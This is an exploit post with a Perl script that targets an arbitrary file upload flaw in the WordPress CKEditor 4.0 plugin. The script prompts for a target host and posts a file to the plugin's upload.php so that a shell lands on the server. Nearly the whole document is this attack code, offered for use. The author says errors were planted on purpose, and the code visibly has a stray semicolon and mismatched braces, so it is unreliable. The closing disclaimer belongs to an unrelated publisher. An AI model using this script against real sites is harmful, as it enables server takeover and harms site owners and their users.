# Exploit-Title: Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit
# Date: 2013-02-07
# Author: sk0d
# Software-Link: http://downloads.wordpress.org/plugin/ckeditor-for-wordpress.4.0.zip
# Version: 4.0
# Category: web-applications
# GoogleDork: n/a ----> NO! with little errors in sploitcode gainst kiddies :P
# Tested on: Ubuntu-Linux
# Use the following perlcode to upload a shell to compromise the system.
# A real hacker can correct the little errors ;-)
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
- Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit
- Vuln found and exploit written by sk0d SOH-Crew
- Contact: sk0d@web.de
- Greetings: bd0rk, RaSsGoR, x0r_32
INTRO
print "Targethost: ";
chomp (my $tar=<STDIN>);
print "Directory: ";
chomp (my $shell=<STDIN>);
my $a = LWP::UserAgent->new;
my $b = $a->request(POST $tar.'/wp-content/plugins/ckeditor-for-wordpress/includes/upload.php';
Content_Type => 'form-data',
Content => [ NewFile => $shell ] );
if ($b->is_success) {
if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; } else { print "Exploit failed! :(\n";
} else { print "Not connected with Target!\n"; }
exit;
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information